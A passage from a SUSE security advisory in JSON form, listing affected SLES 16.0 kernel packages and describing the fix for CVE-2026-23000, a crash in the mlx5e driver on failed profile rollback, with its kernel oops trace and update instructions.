"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
